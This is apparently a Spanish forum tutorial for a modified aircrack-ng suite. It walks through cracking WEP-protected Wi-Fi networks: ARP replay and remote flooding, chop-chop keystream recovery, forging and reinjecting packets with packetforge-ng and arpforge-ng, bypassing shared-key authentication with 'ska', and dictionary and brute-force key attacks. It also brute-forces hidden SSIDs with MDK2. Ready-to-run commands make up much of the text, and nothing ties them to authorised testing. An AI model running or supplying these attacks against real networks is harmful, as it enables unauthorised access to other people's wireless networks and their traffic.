opciones que aporta la suite enriquezida por thefkboss
aircrack-ng-MOTHER-FUCKER EDITION.
airodump-ngOPCIONES:
--ivs: Captura solo ivs
--gpsd: Para usar un dispositivo Gps
--write <nombre del archivo a guardar> :crea un archivo del nombre que le hallamos puestos y con la extensión(.cap ó .ivs) y empieza a capturar.
-w: es lo mismo que poner write
--beacons: Guarda los beacons, por defecto no los guarda.
---MOTHERFUCKER---
--netmask <netmask> :Seleccionar el AP del que se captura mediante su netmask
--bssid <bssid> : Seleccionar el AP del q se captura mediante su BSSID
--wordlist <files> : Ataque mediante diccionario a red protegida con WEP (necesario ivs)
Por defecto airodump captura todos los canales que se encuentren dentro de la frecuencia 2,4 GHz.
--channel :Captura el canal especificado
--c: Lo mismo que escribir channel
-a: Captura en la frecuencia de 5Ghz especifica del canal a
--abg: Captura tanto en frecuencias de 2,4Ghz como en 5 Ghz
---MOTHERFUCKER----
--cswitch <method> : Captura de canal mediante multiples tarjetas
0 : FIFO (por defecto)
1 : Round Robin
2 : Mantenerse en el útlimo
-s : igual que --chswitchvamos ha explicar un poco esta ultimas ocipones vamos a poner un ejemplo para q sea mas facil su explicación:
vamos a escanear los canales: "1,2,3,4,5,6" y disponemos de 3 tarjetas (wlan0,ath0,eth1)
RoundRobin:wlan0 captura el 1, ath0 captura el 2 y eth1 el 3
en la proxima pasada:
wlan0 4, ath0 5, eth1 6
y vueleve a empezar
wlan0 1, ath0 2 and eth1 3
...
como podemos ver esta opcion puede fallar si las tarjeta posen sensibilidades distintas.
FIFO:wlan0 1, ath0 2, eth1 3
wlan0 2, ath0 3, eth1 4
wlan0 3, ath0 4, eth1 5
...
como podemos ver de esta forma escaneamos todos los canales y si uno de ellos no lo pilla una de las tarjetas la siguiente si
hop on last:wlan0 1, ath0 2, eth1 3
wlan0 1, ath0 2, eth1 4
wlan0 1, ath0 2, eth1 5
...
com podeis ver aqui la única que cambia es la última tarjeta
aireplay-ng -g :bufer ciclicola nueva opcion de MOTHER FUCKER -5
--remoteflood : llamadas al host para flodear la red (-5)
Para q sirve bufer ciclico: pues sirve xq algunos AP cuando se repite el vector inicial IVS muchas veces(es decir cuando atakamos) llegan un momento q los rechazan de esta forma crearemos un archivo de repaly en el q todos los ARP q tengamos seran distintos unos de otros lo usamso de la siguiente forma
aireplay-ng -3 -b BSSID -h STATION -x 1024 -g 1000000 ath0
lo q hay despues de la
g es el numero de ARP distintos q va ha guardar podeis poner el numero q querais es recomendable poner de 1000000 en adelante xq asi nos aseguraremos q 1000000 de los q tengamos llevaran el IVS distinto y no se repetitan(recordar q el archivo q se crea es .cap y ocupa espacio 1millon=60megas no os paseis poneido millones)
Para q sirve remoteflood[/b] (en la version 0.4 se ha eliminado esta opcion ya q sirve igual el packetforge)aireplay usa una keystream (xor) para enviar un paquete udp encpriptado a un host remoto. el host remoto esta montado sobre un servidor, esperando un paquete para reenviar un numero especifico de paquetes por segundo de vuelta. Es muy efectivo.Se puede capturar mas de 1800 packetes/segundo con este ataque. La transferencia usada es server/client 1MBit/seg or 110KByte/seg. A esta velocidad se puede capturar 100.000 paqutes en 54segundos 1 million paquetes en 9 minutos.
como usarlo:primero hay que hacer ataque CHOP-CHOP para optener el archivo .xor
aireplay-ng -5 -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -k <srcIP[:port]> -l <destIP[:port]> -o <iface>
parches mejorados para las IPW2200 y para las BROADCOM bcm43xx ya aplicados sobre aireplay-ng para reinyectar
nuevo programa
packetforge-ngsirve para crear paquetes del tipo ARP UDP ICMP CUSTOM y reinyectarlos y asi conseguir gran cantidad te IVS.
Lo primero es realizarzar el ataque CHOP-CHOP y despues usamos el Packetforge de la siguiente manaera.
Como forjar un pakete mediante el archivo capturado .xor El atake -4 lo tienes q construir siempre y cuando haya un cliente conectado a esa APesto te genera el *.xor :
aireplay-ng -4 -h mac del cliente del AP(NO VALE NINGUNA OTRA )
Esperas a que aparezca un paquete cualquiera de es AP aunque tu cliente no aparezca como destinatario y lanza el ataque, te saca las IP una vez creado el archivo .xor mediante
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
ahora q sabemos las ip creamos el paquete
packetforge-ng --tipo de paquete -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>
eso hara q se cree un archivo llamado ejemplo
y ahora lo reinyectamos con ataque
2 el 3 no vale xq solo reinyecta ARP asi q usamos
aireplay-ng -2 -r ejemplo <iface>
debemos insertar el paquete cada 30 segundo asi q usamos
aireplay-ng -2 -r ejemplo -x 0.033 <iface>
si es udp pues pones:packetforge-ng --udp -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>
si es icmp:packetforge-ng --icmp -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>
asi sucesivamente.
necesitas el archivo *.xor porq lo q hace es volver a encriptarlo con la contraseña correcta para q puedas enviarle el paquete q el router lo reconozca y genere trafico.
aircrack-ng de este se ha añadido la opcion de utilizar diccionario contra wep se usa igual que diccionario contra wpa y una nueva opcion la -z que sirve para hacer ataque de fuerza bruta contra clave alfanumerica de 64-bytes si de seamos sacar la clave completa con esta opcion tarda unas 10 horas probando todas las combinaciones si establecemos una combiancion puede tardar o segundos o unos 5 min
aircrack-ng -w diccionario archivo.ivs
una utilidad curiosa es q puedes usar el wlandecrypter directamente
wlandecrypter.exe bssid essid | aircrack-ng -m MAC DEL AP -w diccionario archivo.ivs
Recordar q esta version ya lleva
parches mejorados para las IPW2200 ya aplicados sobre aireplay-ng para reinyectar
una breve y clara explicacion nueva version 04 , herramienta SKA
[/size][/color]
basicamente la diferencia entre OPEN WEP KEY Y SHARED WEP KEY es q con open se puede asociar todo el mundo al AP por eso el aireplay funciona cuando se asocia una
STATION en cambio en este modo SHARED el AP le hace primero la pregunta a la STATION enviandole un paquete q este debe encryptar y devolverselo de
forma correcta el AP revisa si esta bien encriptado y si es asi le deja asociarse.
bueno hasta aqui la teoria vamos con la practica instala el aircrack-ng motherfuker hay un programa nuevo llamado ska es digamos como el ataque 1
de asociacion sirve para eso
primeros pasos abrimos airodump-ng como siempre
ataque 4 chop-chop caputramos el xor de momento no hace falta saber la ip ni nada de eso solo tener el archivo.
hacemos ataque 3 con el cliente falso tipico 00:11:22:33:44:55 no importa q te diga compruebe si el cliente esta conectado lo dejamos funcionando para
hacer la asociacion y obtener ARP
rapidamente ejecutamos el ska (no hace falta la velocidad del rayo)
ska ath0 "essid" bssid AP MAC CLIENTE FALSO replay_dec-0912-185527.xor
pues si ha salido bien ya estamos conectadoS (COMO SI FUESE ATAQUE 1) y enviando ARP mediante el aireplay q hemos abierto.
OTRAS POSIBILIDADES A PROBAR
ENVIO DE ARP GENERADOS POR NOSOTROS MISMOS con cliente falso
[/size][/color]
miramos lo de la IP del chop chop la primera q tienes q poner pon esta 192.168.1.255 (segun la q tu tengas) lo importante es el final osea el 255
bien ahora generamos nuestro ARP
arpforge-ng replay_dec-0627-022301.xor 1 MAC AP MAC CLIENTE FALSO(en nuestro caso 00:11:22:33:44:55) 192.168.0.255(acuerdate del 255al final la ip ) 192.168.0.2(vale cualquiera xq es un cliente falso pero q concuerde con la ip es decir no vale 100:120....) arp.cap
bien ya hemos creado un archivo llamado arp.cap
ahora nos asociamos
ska ath0 "essid" bssid AP MAC CLIENTE FALSO replay_dec-0912-185527.xor
e inyectamos nuestro arp
aireplay-ng -2 -r arp.cap -x 1000 ath0
ENVIO DE ARP GENERADOS POR NOSOTROS MISMOS con cliente autentico
[/size][/color]
miramos lo de la IP del chop chop la primera q tienes q poner pon esta 192.168.1.255 (segun la q tu tengas) lo importante es el final osea el 255
la segunda hay q poner la q te da.
arpforge-ng replay_dec-0627-022301.xor 1 MAC AP MAC CLIENTE legitimo 192.168.0.255(acuerdate del 255al final la ip ) 192.168.0.2(ip del cliente legitimo) arp.cap
e inyectamos nuestro arp
aireplay-ng -2 -r arp.cap -x 1000 ath0
Recordar q esta version ya lleva
parches mejorados para las BROADCOM bcm43xx ya aplicados sobre aireplay-ng para reinyectar
COMO AVERIGUAR EL SSID OCULTO SIN CLIENTES CONECTADOS (solo version 0.8 )Debemos usar el programa MDK2 creado por ASPj
Las redes con SSID oculto el airodump te dira la longitud maxima del texto q lleva y despues sacaremos este usando la fuerza bruta del programa MDK2 de la siguiente forma.
instalamos MDK2 y ejecutamos de la siguiente forma para hacer el ataque:
mdk2 <interface> p -b <caracteres a usar> -t <bssid>
caracteres a usar:
n solo numeors
l letras en minusculas
u letras en mayusculas
c minusculas y mayusculas
m lminusculas y mayusculas y numeros
a todoslos caracteres
detras de caracteres puedes especificar un SSID de la misma longitud del SSID real para comenzar la fuerza bruta desde ese nombre haciendo las posibles combinaciones.
Ejemplo:
mdk2 ath0 p -b n 010020 -t 00:11:22:33:44:55 -s 100
-s=paquetes por segundo a enviar para hacer el ataque
Autor